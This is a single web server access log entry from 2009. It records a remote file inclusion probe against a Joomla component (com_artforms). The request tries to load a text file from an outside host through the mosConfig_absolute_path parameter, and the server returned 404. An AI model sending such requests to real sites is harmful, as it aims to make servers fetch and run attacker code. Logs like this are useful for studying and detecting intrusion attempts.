85.17.19.172 - - [15/Oct/2009:23:27:53 -0500] "GET /logs///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
